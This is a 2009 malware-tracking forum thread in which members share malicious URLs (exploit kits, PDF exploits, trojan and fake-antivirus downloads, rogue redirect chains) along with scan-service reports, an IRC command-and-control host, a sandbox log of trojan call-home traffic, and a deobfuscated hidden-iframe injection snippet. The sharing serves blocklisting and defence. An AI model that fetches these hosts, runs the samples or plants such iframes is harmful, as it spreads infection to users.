http://wepawet.iseclab.org/view.php?hash=5edd49ee3561911ff34c53abade513a6&type=js
Result: 12/40 (30.00%)
http://www.virustotal.com/analisis/4e8ce4cab8a08a7754395eaf6192ce3a
Now go dig on the rest of domains there...
http://www.robtex.com/ip/210.83.85.94.html
===========================
Quote
hxxp://megapupseg.ru/xtrm/index.php
hxxp://www.murka-best.com/index.php?sall=miks_ind
===========================
Quote
hxxp://team-sleep.by.ru/menu.html
hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/courier.html
hxxp://5rublei.com/unique/index.php
hxxp://bizoplata.ru/mortgage.html
hxxp://myrurrly.com/in.cgi?pipka3S
hxxp://tixwagoq.cn/in.cgi?4
hxxp://tochtonenado.com/yes/index.php
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/belt.html
hxxp://mixbunch.cn/scarf.html
http://wepawet.iseclab.org/view.php?hash=7ac93ca405a6fc78e1e19062eee91e52&t=1239885967&type=js
===========================
Quote
hxxp://startdontstop.ru/bigmac.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
Title: Re: daily something......
Post by: SysAdMini on April 16, 2009, 02:43:26 pm
Code: [Select]
http://www.webpresence4u.co.uk/forms/use/email/POSTALESAMORPORSIEMPRE.phphttp://www.virustotal.com/analisis/a57dbbe538cbe01a060e27c60e0ff2a0
http://www.threatexpert.com/report.aspx?md5=ba19812a5c24c50bb7480d55e2e081ca

corresponding irc c&c
Code: [Select]
cnz0k3r.cdmon.org:6667
Title: Re: daily something......
Post by: CkreM on April 17, 2009, 03:13:47 am
Exploit which lead to pinch trojan:
Code: [Select]
counnter.cn/z/count.php?o=1http://wepawet.iseclab.org/view.php?hash=d62dc864116e5643e88dc14b2b3b4a8e&t=1239864253&type=js
The pinch trojan:
Code: [Select]
counnter.cn/z/getexe.exe?o=1&t=1239892251&i=2057619350&e=1http://www.virustotal.com/analisis/da79eef38206c2e643777c17191ea4a8

Exploit/trojan:
Code: [Select]
teenagersporn.net/project2/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=bad316b7e10f1195eda2adf0c3da0a49&t=1239918254&type=js
Exploit/trojan:
Code: [Select]
google-advisior.cn/project2/index.phphttp://wepawet.iseclab.org/view.php?hash=535c6efb84e00f72ff3f5ecf9aca3df5&t=1239870763&type=js
Exploit/trojan:
Code: [Select]
hackzona.info/s/index.phphttp://wepawet.iseclab.org/view.php?hash=dcac90e453678bee26d187e37474d291&t=1239872153&type=js
Pdf exploit/trojan:
Code: [Select]
http://liteautogreatest.cn/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=2030ec9e4312994722b9a2037911d8dc&t=1239819716&type=js

Domain listed on MDL but on different directory
Code: [Select]
d0lphin.biz/mix/pdf.phphttp://wepawet.iseclab.org/view.php?hash=5e69487565b54590dc4521945162dbe7&t=1239873022&type=js

Redirects to rogue:
Code: [Select]
sotoviy.info/0/go.php?sid=2
uouo.info/0/go.php?sid=2
leshik.info/0/go.php?sid=2
wazo.info/0/go.php?sid=2
lavo.info/0/go.php?sid=2
reliable-anti-virus.info/0/go.php?sid=2
webportal-sms.info/0/go.php?sid=2
spyware-guard.info/0/go.php?sid=2
spyware-soft.info/0/go.php?sid=2
spyware-security.info//0/go.php?sid=2
all redirect to online scan:
Code: [Select]
loyal-porno.com/scan/?id=260
Title: Re: daily something......
Post by: SysAdMini on April 18, 2009, 08:31:25 am
Code: [Select]
www.catch-you.ru/files/winsetup66.exehttp://www.virustotal.com/analisis/e63c9ea8320708d2dd2e705f6bf73da6 8/40
http://www.threatexpert.com/report.aspx?md5=6c05f6bd103d84523d6aea9d19b3f2cd

Code: [Select]
www.catch-you.ru/files/wingo.exehttp://www.virustotal.com/analisis/eb2b1f73f0f3ace4a8243aa46845cc91 18/40

Code: [Select]
www.catch-you.ru/files/ftp_non_crp.exehttp://www.virustotal.com/analisis/acd15fdd1fa850b4a0d162ebde7dadf2 35/40

Code: [Select]
www.catch-you.ru/files/ru12.exehttp://www.virustotal.com/de/analisis/a74d38aa72e78450b2eb46a299a72b8a 2/39

Code: [Select]
www.catch-you.ru/files/jnk.exehttp://www.virustotal.com/analisis/bf082a8a4632ea8d382d3fb756713b2a 13/39

Code: [Select]
www.catch-you.ru/files/pac2.exehttp://www.virustotal.com/analisis/5cc7f9b74b036bd4dc4975035711fd28 10/37

Code: [Select]
www.catch-you.ru/files/Winset20.exehttp://www.virustotal.com/analisis/f46ca5e54daa7244a134623b968c74b8 5/40
http://www.threatexpert.com/report.aspx?md5=b88e83a2fc5d229f0a3ed5e790c395e1

Code: [Select]
www.catch-you.ru/files/1000.exehttp://www.virustotal.com/analisis/02a62655684eb0bdeb9acd9a23deb80f 17/39
Title: Re: daily something......
Post by: Malware-Web-Threats on April 18, 2009, 10:27:35 am
Exploit:
Code: [Select]
hxxp://beebest.cn/dlutrl23dnwfas/index.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=8c979b2883f0cf92419a4b342fff4545&t=1240050576&type=js)

PDF:
Code: [Select]
hxxp://beebest.cn/dlutrl23dnwfas/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=07dba62f6c9ddb0e4382026de7b1df26&t=1240050583&type=js)
VirusTotal (http://www.virustotal.com/analisis/c6e2fe3fbaf95d5730763c3f4d819808) - 10/40 (25%)

Exe:
Code: [Select]
hxxp://beebest.cn/dlutrl23dnwfas/exe.php
VirusTotal (http://www.virustotal.com/analisis/e215d34b9667869918886503a1233011) - 7/40 (17.5%)
Title: Re: daily something......
Post by: sparsha on April 19, 2009, 07:27:13 am
AV Antispyware rogue related sites
Code: [Select]

http://int.reporting32.com/stat.php?func=installrun&id=200002&landing=-1&lang=EN&sub=0
http://dl.scan-antispy-4pc.com/get/?pin=0&lnd=0&type=main
http://sales.mypaymentarea.com/MjAwMDAy_MA==_QkE0MjAxNEM5RTNCMjI3OEE2QkI=/YXZh/1
https://wisypay.net/purchase/?vendor=2&id=49eaa01f4444b

Title: Re: daily something......
Post by: CkreM on April 20, 2009, 05:57:08 am
Redirects to exploits:
Code: [Select]
odmina.ru/?v=myid37&lid=1033http://wepawet.iseclab.org/view.php?hash=2a8ea1f1e331a0826ca485ab9e3232e3&t=1240038315&type=js
Redirect to exploits:
Code: [Select]
mixbunch.cn/thread.htmlhttp://wepawet.iseclab.org/view.php?hash=c6f531cec4db882e322b62f802e8c481&t=1240199423&type=js
Exploits/trojan:
Code: [Select]
sunmaiamibich.ru/pupu/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=cea26289df93bc2a5fd52c0d8767305a&t=1240188628&type=js

Trojan:
Code: [Select]
tayforlive.ru/gh.exehttp://www.virustotal.com/analisis/4317e8d4fca9ab9bf03c9cb727e43037
Trojan:
Code: [Select]
feds-r-watching.us/load.php?id=0&spl=1.exedechttp://www.virustotal.com/analisis/8b1f9ae18260c2d50f447e34eef66e02

Redirect to rogue:
Code: [Select]
spyware-files.info/0/go.php?sid=2
spyware-file.info/0/go.php?sid=2

AV fraud:
Code: [Select]
http://loyalvideoz.com/scan/?id=260
Title: Re: daily something......
Post by: sparsha on April 21, 2009, 12:59:20 pm
Sites related to rogue application: Home Antivirus 2009

Code: [Select]
h-a-virus-2009.com
h-a-virus2009.com
h-anti-virus-2009.com
h-anti-virus2009.com
h-antivirus2009.com
h-avirus2009.com
ha-virus2009.com
hanti-virus2009.com
hantivirus2009.com
havirus2009.com
home-a-v-2009.com
home-a-virus-2009.com
home-anti-v2009.com
home-anti-virus-2009.com
home-anti-virus2009.com
home-antiv2009.com
home-antivirus2009.com
home-av-2009.com
home-av2009.com
home-avirus2009.com
homeanti-virus-2009.com
homeantiv2009.com
homeantivirus2009.com
homeav-2009.com
homeav2009.com
homeavirus-2009.com
homeavirus2009.com
Title: Re: daily something......
Post by: CkreM on April 21, 2009, 09:19:08 pm
Exploit/trojan:
Code: [Select]
yes-exploit.ru/include/spl.phphttp://wepawet.cs.ucsb.edu/view.php?hash=a4e75eb21b28ff23ca48d8d41dad895c&t=1240269807&type=js

Trojan:
Code: [Select]
125.87.2.125/mt/load.php?id=1http://www.virustotal.com/analisis/b973239d38eb93711e46ab7c8d7d8c60
Title: Re: daily something......
Post by: SysAdMini on April 22, 2009, 04:43:24 am
Code: [Select]
coolwallpapers.statusinfotech.com/ppi/install.exehttp://virscan.org/report/6fcf3670f1e511be8925b19d176205dc.html 14/38
Title: Re: daily something......
Post by: SysAdMini on April 22, 2009, 06:33:20 am
Code: [Select]
sb123.8800.org/files/6.loghttp://virscan.org/report/40e37183b23ef501c8c163b35a101441.html 2/38
http://www.threatexpert.com/report.aspx?md5=09cf1539317a107b134595f404aafdb2

Code: [Select]
ipkipk.3322.org/ipk.exehttp://virscan.org/report/711955885ef09950a2dd07800447e45e.html 9/38
Title: Re: daily something......
Post by: Malware-Web-Threats on April 22, 2009, 11:26:06 am
209.44.126.29

Redirects to exploits:
Code: [Select]
hxxp://individualpeople.biz/go.php?sid=1
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=20ed2f4e9b82bc72da58403395eecc90&t=1240399179&type=js)

Exploits:
Code: [Select]
hxxp://individualpeople.biz/go.php?sid=6
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=ba7be5413ac16dab6608f2373a32b615&t=1240196375&type=js)

PDF Exploits:
Code: [Select]
hxxp://209.44.126.30/unsecurity/pdf.php?id=19663

File name: 1.pdf
File size: 7324 bytes
MD5: be9a4f50c3fb024a170b9ec53dd712d4
VirusTotal (http://www.virustotal.com/analisis/9affe859e1ca7d88b7a21f542ede998d) - 15/40 (37.5%)

Trojan:
Code: [Select]
hxxp://209.44.126.30/unsecurity/load.php?id=19663

File name: load.exe
File size: 94208 bytes
MD5: 47c0c6c2ce07c291651070b03dd83d7f
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/3124e314d118f381c25da0d51dab676a) - 29/40 (72.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=172499a592cac0b249dde8fc2e3eed994)

Quote
From ANUBIS:1033 to 92.48.91.145:80 - [trafficstatic.net] 
Request: GET /banner/crcmds/main 
Response: 200 "OK" 
.......
From ANUBIS:1053 to 72.233.114.126:80 - [statsanalist.cn] 
Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5 
Response: 200 "OK" 
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5 
Response: 200 "OK" 
Title: Re: daily something......
Post by: SysAdMini on April 22, 2009, 07:22:22 pm
Code: [Select]
xy1.gac4a.com/01/v.exehttp://www.virustotal.com/analisis/a441100772fc53ac9df07971ce444d7e 23/39
Title: Re: daily something......
Post by: Malware-Web-Threats on April 22, 2009, 07:35:11 pm
JS IFRAME
Code: [Select]
hxxp://counnter.cn/top100_00.js
Wepawet (http://wepawet.iseclab.org/view.php?hash=c52bd9668a5eee067b99975751391185&t=1240427410&type=js)

Exploits:
Code: [Select]
hxxp://counnter.cn/z/count.php?o=1
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=d62dc864116e5643e88dc14b2b3b4a8e&t=1239864253)

Exploits:
Code: [Select]
hxxp://counnter.cn/z/exploits/x9.php?zenturi=1
hxxp://counnter.cn/z/exploits/x7b.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=49757767a3408050c3f82314a919217c&t=1240428143&type=js)
Jsunpack (http://jsunpack.jeek.org/dec/go?url=counnter.cn_z_exploits_x7b.php)

Exploits (x15b.zip):
Code: [Select]
hxxp://counnter.cn/z/exploits/x15b.php
VirusTotal: Trojan (http://www.virustotal.com/analisis/735e8f07bf3a55fc8d0ba70ee71379f6) 33/40 (82.5%)

Trojan (getexe.exe):
Code: [Select]
hxxp://counnter.cn/z/getexe.exe?o=1&t=1239892730&i=2154770527&e=10
VirusTotal: Trojan (http://www.virustotal.com/analisis/34f3b96711f909d233f51ac7335f3fc3) - 15/40 (37.5%)
Title: Re: daily something......
Post by: SysAdMini on April 22, 2009, 07:35:31 pm
Code: [Select]
w.94saomm.com/js.jsredirects to
Code: [Select]
www.10555.com/tv/fs.htmhttp://wepawet.cs.ucsb.edu/view.php?hash=5380b380d7481ff7234b4cc9af6609c0&t=1240429053&type=js

various exploits lead to
Code: [Select]
b.wuc9.com/ac.csshttp://www.virustotal.com/analisis/a3fdd8fcaa34c553ea0f7864296c4628 23/40
Title: Re: daily something......
Post by: PaJamis on April 22, 2009, 10:54:30 pm
hxxp://www.edfvc.com

Comes up with Mal/Obfjs-AE with Sophos
http://www.sophos.com/security/analyses/viruses-and-spyware/malobfjsae.html

Obfuscated JS resolves to:

Code: [Select]
<iframe src="hxxp://googl-analisys.com/adwds/words.php?U8jG" style="display:none"></iframe>
MysteryFCM: Encased iFrame HTML in BBCode "CODE" tags.
Title: Re: daily something......
Post by: CkreM on April 22, 2009, 11:34:25 pm
zbot:
Code: [Select]
zss5dfggd.com/exe/ue.exehttp://www.virustotal.com/analisis/d5ba440a4de0b771088cd4b3714dbfae
Trojan:
Code: [Select]
zss5dfggd.com/exe/9.exehttp://www.virustotal.com/analisis/cafeb16b4df77833b8b1218f2f30b3ea
Trojan:
Code: [Select]
zss5dfggd.com/exe/lich.exehttp://www.virustotal.com/analisis/dde89e65277fe2cab50bc054c4c1e499
Trojan:
Code: [Select]
zss5dfggd.com/exe/gld.exehttp://www.virustotal.com/analisis/c48f145c65c717fcf4b750ae2c7cdd89
Trojan:
Code: [Select]
zss5dfggd.com/exe/mp.exehttp://www.virustotal.com/analisis/862f2e619d840b98a6e359e2ddb84f24

Fake AV:
Code: [Select]
winpcdown9.com/pcdef.exehttp://www.virustotal.com/analisis/ad13d92e29f9521c6ae48760ea106ed9
and the payment site it use:
Code: [Select]
billingpayment.net/pp/?id=
Fake online scan:
Code: [Select]
litetubevideoz.com/scanand the trojan that is downloaded:
Code: [Select]
litetubevideoz.com/codec.exehttp://www.virustotal.com/analisis/7b25de92bab8faf17a0da0acd7464afb

trojan:
Code: [Select]
litetubevideoz.com/null/exe2/3913443.exehttp://www.virustotal.com/analisis/4ba420744c78124fe6c00a28045628ae

Fake online scan:
Code: [Select]
online-spyware-scan.net/online-scan.html?ewmid=226
Title: Re: daily something......
Post by: SysAdMini on April 23, 2009, 12:53:43 pm
from banner ads to fake av

Code: [Select]
perfect-banner.com/www/images/300x250_uof_2.swf?clickTARGET=_blank&clickTAG=http://perfect-banner.com/www/delivery/ck.php?oaparams=2__bannerid=250__zoneid=171__cb=c8b86ececehttp://wepawet.iseclab.org/view.php?hash=17501d47ade222cffa45fc0f2f7c84bc&type=swf

swf redirects to
Code: [Select]
enjoyspringtime.com/?cmpid=dologology
redirects to
Code: [Select]
crustat.com/ts/in.cgi?mfcdologology&se=oth&ur=1&HTTP_REFERER=enj-cmpid%3Ddologology

redirects to
Code: [Select]
pnfzetnax.net/pro/dologology/
redirects to
Code: [Select]
78.47.132.220/aff78.php?url=http://truconv.com/?a=125&s=4a78
redirects to
Code: [Select]
78.47.132.220/a82a/cr/adv/142/index.html
Code: [Select]
78.47.132.220/a82a/cr/srm_free_setup.exehttp://www.virustotal.com/de/analisis/07fe8c68d017097af9ec74ebb8cc1dc6 18/40
MD5...: 66c7e910330c631ba4515781f44e2788




Title: Re: daily something......
Post by: CkreM on April 24, 2009, 12:14:52 am
Exploits/Pinch trojan:
Code: [Select]
indiasportnews.com/mt/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=4bb0a47f5b7fefbf32bb501c2f314bc0&t=1240532359&type=js

Trojan:
Code: [Select]
crisiss.net/at.exehttp://www.virustotal.com/analisis/7fcd8acc15681586603bbb368a75fd54

Fake AV - pretty big one,5.8MB
Code: [Select]
setup.malwareremovalbot.com/setup.exehttp://www.virustotal.com/analisis/cf5ed54f4ec27bc84aaa528f50dd750a
Title: Re: daily something......
Post by: Malware-Web-Threats on April 24, 2009, 10:49:44 am
Redirects to trojan:
Code: [Select]
hxxp://zbesttds.com/in.cgi?3
hxxp://zbesttds.com/in.cgi?4
Wepawet (http://wepawet.iseclab.org/view.php?hash=8f02ba1f78de6938def093f3e1c0d3c1&t=1240567079&type=js)
Code: [Select]
hxxp://zbesttds.com/in.cgi?5
hxxp://400.myfilehostings.net/movie.html
Wepawet (http://wepawet.iseclab.org/view.php?hash=6f34c32530fef1bf4e158c4f8c03f0e5&t=1240568871&type=js)
Code: [Select]
hxxp://tafficbots.com/in.cgi?8
hxxp://tafficbots.com/in.cgi?9
Wepawet (http://wepawet.iseclab.org/view.php?hash=b94025b4f058045a56a43069a3e1bfed&t=1240569469&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=633582e4121c69b1958525add78f77de&t=1240569515&type=js)
Trojan:
Code: [Select]
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424095121892881/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424095121892881/2.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/2.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/3.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/4.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/6.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/7.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/8.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/9.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424103022287492/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241031340125215/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241035734251381/1.gif
Quote
Size:   125440 bytes,
MD5:   f4342703b051c0ea1c81f0330f10dc3f
VirusTotal (http://www.virustotal.com/analisis/acfa3c724c289794d4a89ba772b69811) - 30/40 (75%)

*****************
Redirects to google:
Code: [Select]
hxxp://zbesttds.com/in.cgi?11
hxxp://zbesttds.com/in.cgi?16
Wepawet (http://wepawet.iseclab.org/view.php?hash=332ec8368583bb2ce3be288e149dc3db&t=1240566551&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=af20a07cd051895441993908c11e13ec&t=1240566589&type=js)

*****************
Redirects to rogue: (dead since a few hours)
Code: [Select]
hxxp://zbesttds.com/in.cgi?14
Wepawet (http://wepawet.iseclab.org/view.php?hash=cba930c84e61fb44e0f5d20bc30c0e95&t=1240566362&type=js)

*****************
Redirects to rogue:
Code: [Select]
hxxp://hitmidpoint.com/?accs=809&tid=1
hxxp://staritquick.com/in.cgi?13&gai=csptop&gli=100&gff=cs_362527174&al=
Wepawet (http://wepawet.iseclab.org/view.php?hash=3d0150bd82c70819f998c387e76d1c2f&t=1240568055&type=js)

*****************
Redirects to fake codec page:
Code: [Select]
hxxp://delshiktds.com/in.cgi?3
hxxp://myhealtharea.cn/in.cgi?2
Fake codec page:
Code: [Select]
hxxp://xtube-download.freehostia.com/tube.htm
Wepawet (http://wepawet.iseclab.org/view.php?hash=d3567427faceb030997915bee804c0cf&t=1240565964&type=js)

*****************
Redirects to fake codec page:
Code: [Select]
hxxp://tafficbots.com/in.cgi?7
Wepawet (http://wepawet.iseclab.org/view.php?hash=6e22b57b654e6eeaa93887271fb84dc3&t=1240569461&type=js)
Fake codec page:
Code: [Select]
hxxp://megaporntubes09.com/xplaymovie.php?id=40011
Wepawet (http://wepawet.iseclab.org/view.php?hash=6e22b57b654e6eeaa93887271fb84dc3&t=1240569461&type=js)
Trojan:
Code: [Select]
hxxp://lll-softportal.com/softwarefortubeview.40011.exe
VirusTotal: Trojan (http://www.virustotal.com/analisis/d9a5fd9a4915b87759a0544e7b8f97d3) - 7/40 (17.5%)

*****************
Redirects to rogue:
Code: [Select]
hxxp://kernelseo.com/in.cgi?default&parameter=up-file+download&se=15557
Wepawet (http://wepawet.iseclab.org/view.php?hash=4f32a80ccc9f49057e5d1a596bf6b010&t=1240385217&type=js)
Title: Re: daily something......
Post by: sparsha on April 25, 2009, 05:01:16 am
Code: [Select]

http://antivir-scan-pro-best.com/11041/3/
http://files.load-archive-av-pro.com/normal/setup_11041_3_1.exe
http://int.sysproreport1.com/stat.php?func=installrun&id=11041&landing=-1&lang=EN&sub=1&notstat=1
http://dl.super-top-scan-pro.com/get/?pin=11041&lnd=-1&type=main

http://files.get-fails-load-av.com/release/setup.exe
http://dl.scan-anti-spy-4free.com/get/?pin=0&lnd=-1&type=scanner

Title: Re: daily something......
Post by: SysAdMini on April 25, 2009, 09:33:12 am
Code: [Select]
music24shop.net/2/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=cbf9102477119497295d517be62e4053&t=1240651814&type=js

Code: [Select]
http://music24shop.net/2/pdf.phphttp://www.virustotal.com/analisis/08f4c49651626507490afd80932f4f71 1/38

Code: [Select]
music24shop.net/2/load.php?id=6http://www.virustotal.com/analisis/dd3c7093b2b0827d6ee987b83f015faa 7/40
Title: Re: daily something......
Post by: CkreM on April 26, 2009, 07:03:19 am
Exploit/trojan:
Code: [Select]
wtopcompany.ru/cms/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=3f1acb074a6e8c6b03da890c06e1c4db&t=1240555768&type=js

Fake AV scan:
Code: [Select]
tubeontvgl.com/scan/?id=262whats downloaded from there:
Code: [Select]
uploadmoviez.com/codec.exehttp://www.virustotal.com/analisis/3a09d83950707cd8c0f4c23d913c0129

Same files on the same ip:
Code: [Select]
youngsters.ru/codec.exe
pc-codec-pack.com/codec.exe
suckitnow1.net/codec.exe
velzevuladmin.com/codec.exe
Title: Re: daily something......
Post by: CkreM on April 26, 2009, 09:03:18 am
Rogue:
Code: [Select]
Snobelium.com
Diastolea.com
cussermono.com
Title: Re: daily something......
Post by: SysAdMini on April 26, 2009, 10:24:31 am
Rogue:
Code: [Select]
Snobelium.com
Diastolea.com
cussermono.com

look like templates for future fake avs. there is no additional content than the page itself.
Title: Re: daily something......
Post by: CkreM on April 27, 2009, 04:19:36 am
Rogue:
Code: [Select]
Snobelium.com
Diastolea.com
cussermono.com

look like templates for future fake avs. there is no additional content than the page itself.

yea i noticed that.
will have content in the future probably..


seem like irc bot/backdoor:
Code: [Select]
77.75.105.221/e-card/e-card.gif.exehttp://www.virustotal.com/analisis/335638c7877b9d21eabb7f5e12881fe9
Title: Re: daily something......
Post by: RS-232 on April 27, 2009, 11:28:05 am
For the fun of it...
Quote
hxxp://youarelucky.biz/SmartDownload.exe
http://www.virustotal.com/analisis/786657fbd9af08fef0cb1745bce68fa5
hxxp://200.122.168.229/dl/goldvipclub/TrackDownload.dll?DID=991392
http://www.virustotal.com/analisis/5d97aab77fba7ca6ab7ecf6728034a15
hxxp://200.122.168.229/dl/goldvipclub/
http://www.virustotal.com/analisis/aef4b913ccfbe8918e83a8ed48870ddd
Title: Re: daily something......
Post by: XiTri on April 27, 2009, 03:16:41 pm
This
Code: [Select]
http://neono.biz/myy/index.phpAnd this
Code: [Select]
http://tipojud.com/quq/1/loads.php?id=68
Title: Re: daily something......
Post by: Malware-Web-Threats on April 27, 2009, 10:06:49 pm
exploits:
Code: [Select]
hxxp://210.240.61.68/fish/GV14.htmWepawet (http://wepawet.iseclab.org/view.php?hash=3b005d98e244f3ac81a6f4e59c1ecb68&t=1240870109&type=js)

trojan:
Code: [Select]
hxxp://www.spps.hlc.edu.tw/fish/1.exeVirusTotal (http://www.virustotal.com/analisis/6e8ce06db44695743a9fc41859394f50) - 17/40 (42.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=10e108d39962a6ac4754702165f33b3e7)
Title: Re: daily something......
Post by: michajp on April 28, 2009, 02:17:16 am
'Greeting cards' (IRC bot/backdoor):

Code: [Select]
hxxp://greetings.3utilities.com/logs/greetings.exe
hxxp://66.83.239.226/E-Greetings.exe
Title: Re: daily something......
Post by: CkreM on April 28, 2009, 03:51:19 am
Fake AV:
Code: [Select]
fullsecurityaction.com
Anytoplikedsite.com
yourpcshield.com
totalvirushield.com
myfirstsecurityscan.com
stopspyware.org

Exploit/trojan
Code: [Select]
78.47.132.221/l3/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=6f5cdfe1c1aeb5cd68a034c3c2984dc8&t=1240889755&type=js

Seems like koobface
Code: [Select]
70.254.41.230/setup.exehttp://www.virustotal.com/analisis/9dfc0bc4f3e5ea13ae76859d939a8fd8
Title: Re: daily something......
Post by: RS-232 on April 28, 2009, 07:36:57 am
Quote
hxxp://verringo.cn/bmngr2/controller.php?action=bot&entity_list=
From the same ip:
Quote
hxxp://www.downloads-123.com/dyyhhj1g/3j2khf32/aap.exe
http://www.virustotal.com/analisis/85d89df7d1f11b6178ba112551a4c248
hxxp://downloads-123.com/guard.exe
http://www.virustotal.com/analisis/1e3f57b7808d6e154dcea62a6e53d2f0
Result: 1/40 (2.5%)

Quote
hxxp://91.207.61.12/stata/controller.php?action=bot&entity_list=
From the same ip:
Quote
hxxp://tomohappy.com/forum/data.php?id=500
hxxp://tomohappy.com/forum/data.php?id=5xx   // where xx is whatever numeric value...
http://www.virustotal.com/analisis/97eb93b986035c20b613677ba6235136
Result: 13/40 (32.50%)

Quote
hxxp://goooodbill.cn/unig/load.php
http://www.virustotal.com/analisis/5b838bbb5899ae16758851bf33d7521c
Result: 15/40 (37.5%)

Quote
hxxp://myspyfiles.cn/qazwsx/index.php
Injection - redirects to the already listed rutraff.cn:
http://www.google.com/search?hl=en&q=myspyfiles.cn&btnG=Google+Search

Quote
hxxp://xcount.cc/ads/in.cgi?13
hxxp://weh8dnb.com/cp/index.php
hxxp://weh8dnb.com/cp/load.php
http://www.virustotal.com/analisis/143e40ce67aa7846b7a06ac080c6bb34
Result: 4/40 (10%)
Title: Re: daily something......
Post by: SysAdMini on April 28, 2009, 09:10:29 am
Code: [Select]
sorwwwros.cn/life/t.php
Code: [Select]
sorwwwros.cn/life/fdoc.pdfhttp://www.virustotal.com/analisis/7e2777e6031abc9c55597bd880ad2f25 6/40
MD5...: 9de067ace8636a8a788a3925533e9660
http://wepawet.cs.ucsb.edu/view.php?hash=9de067ace8636a8a788a3925533e9660&type=js

Code: [Select]
sorwwwros.cn/life/fdem.swfhttp://www.virustotal.com/analisis/75ff201372b07627b2e00defa0739510 0/40
MD5...: c7c0f03b8a7fec6b163c501bcb4d8500

payload
Code: [Select]
sorwwwros.cn/life/l.php?b=4&s=PDFhttp://www.virustotal.com/analisis/0b67d1b488abcb478155d20ec2708633 17/40
MD5...: 84909a9d6cdc7c50cfd9da181232df7a
Title: Re: daily something......
Post by: RS-232 on April 28, 2009, 10:38:14 am
The...usual suspects:
Quote
hxxp://rxtraffclicks.com/download/1/1000/5
http://www.virustotal.com/analisis/4e670f047ca735c1e65f8e8aa458ca1f
Result: 15/40 (37.5%)

Quote
hxxp://pornosbest.com/movies/movie1.wmv.exe
http://www.virustotal.com/analisis/64bb880feb8b31a351c2809dc8549dde
Result: 12/40 (30%)
====================
These ones are currently being injected in unsuspected sites...for now,they all leed to (already listed) litevehiclemall.cn...
Quote
hxxp://betbigwager.cn/in.cgi?income61
hxxp://hotslotpot.cn/in.cgi?income65
hxxp://litecartop.cn/in.cgi?income70
hxxp://lotultimatebet.cn/in.cgi?income60

http://www.robtex.com/ip/213.163.91.93.html
http://www.bfk.de/bfk_dnslogger.html?query=213.163.91.93#result
And...
http://www.robtex.com/ip/213.182.197.23.html
http://www.bfk.de/bfk_dnslogger.html?query=213.182.197.23#result

Another one which is being injected...
Quote
hxxp://nyoflak.com/?click=3C5DCB
According to Wepawet,it also leads to "openstats.info":
http://wepawet.cs.ucsb.edu/view.php?hash=b8ace1842982cb47ee7a390120812436&t=1240920333&type=js
But someone didn't wanted to blacklist openstats.info few days earlier that i had mentioned it...   ;D  ;)

Yet one more:
Quote
hxxp://nipkelo.net/?click=5A158BD

The story in short - with even more domains to be blocked etc etc...
http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/

Quote
hxxp://simple-faq.cc/stat.js
hxxp://a-stone.biz/xZfmG3YK1/
hxxp://a-stone.biz/xZfmG3YK1/flash.php?id=1647&spl=14
hxxp://a-stone.biz/xZfmG3YK1/load.php?id=1647
http://www.virustotal.com/analisis/b9495d617e3535b2420d19e25ce1b57f
Result: 16/40 (40%)

Now,what i've found rather interesting...is what happens when quering a-stone.biz directly,via Wepawet...and without with simple-faq.cc referrer:
http://wepawet.cs.ucsb.edu/view.php?hash=5a514c44b04f33c1834083a2a05e1432&t=1240934612&type=js
Code: [Select]
Redirects
From
http://a-stone.biz/xZfmG3YK1/
To
http://grabberz.com
It's a small world out there...   ;)
Title: Re: daily something......
Post by: RS-232 on April 29, 2009, 08:49:20 am
Another lameness which is being injected to sites out there...
Quote
hxxp://77.92.158.122/webmail/inc/web/index.php
Quote
hxxp://77.92.158.122/webmail/inc/web/include/two.pdf
http://www.virustotal.com/analisis/29e7ee82e1302ef9559db58b41527755
Result: 14/40 (35%)
Quote
hxxp://77.92.158.122/webmail/inc/ -> Open dir...
Title: Re: daily something......
Post by: RS-232 on April 29, 2009, 11:13:38 am
Quote
hxxp://betbigwager.cn/in.cgi?income
hxxp://hotslotpot.cn/in.cgi?income
hxxp://litecarfinestsite.cn/in.cgi?income
hxxp://litecartop.cn/in.cgi?income
